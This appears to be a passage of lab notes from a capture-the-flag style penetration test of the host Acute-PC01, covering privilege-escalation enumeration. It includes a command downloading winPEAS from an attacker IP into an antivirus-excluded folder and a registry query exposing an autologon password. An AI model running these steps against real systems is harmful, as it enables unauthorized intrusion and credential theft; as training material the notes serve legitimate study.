InfoSec LAB

Acute_Automated_Acute-PC01

Created: 2 min read

PEAS

PS C:\Utils> iwr -Uri 'http://10.10.16.8/winPEASx64.exe' -OutFile C:\Utils\winPEASx64.exe

Transferring PEAS to the AV-excluded path; C:\Utils\adPEAS.ps1

Executing PEAS on the Acute-PC01 host

LAPS

LSA Protection

Credentials Guard

AV

UAC

5

PowerShell

C:\Users\edavies\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\Utils> cat C:\Users\edavies\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

nothing

Drives

There is the D:\ drive

PS C:\Utils> dir D:\
dir : Cannot find path 'D:\' because it does not exist.
At line:1 char:1
+ dir D:\
+ ~~~~~~~
    + CategoryInfo          : ObjectNotFound: (D:\:String) [Get-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

False-positive

KrbRelayUp

Container

Interesting. PEAS doesn’t flag the current system as a Container, contrary to my speculation

NTLM

RDP

The current user, edavies, has an active RDP session

Autologon

PS C:\Utils> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    0
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x9fed6619
    ShutdownFlags    REG_DWORD    0x13
    DisableLockWorkstation    REG_DWORD    0x0
    EnableFirstLogonAnimation    REG_DWORD    0x1
    AutoLogonSID    REG_SZ    S-1-5-21-2560123600-3246320471-2688489995-1001
    LastUsedUsername    REG_SZ    edavies
    allocatecdroms    REG_SZ    1
    allocatefloppies    REG_SZ    1
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    edavies
    DefaultPassword    REG_SZ    Password1!
    DefaultDomainName    REG_SZ    Acute
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

Certificate

wsl.exe

Interactive Graph View

Backlinks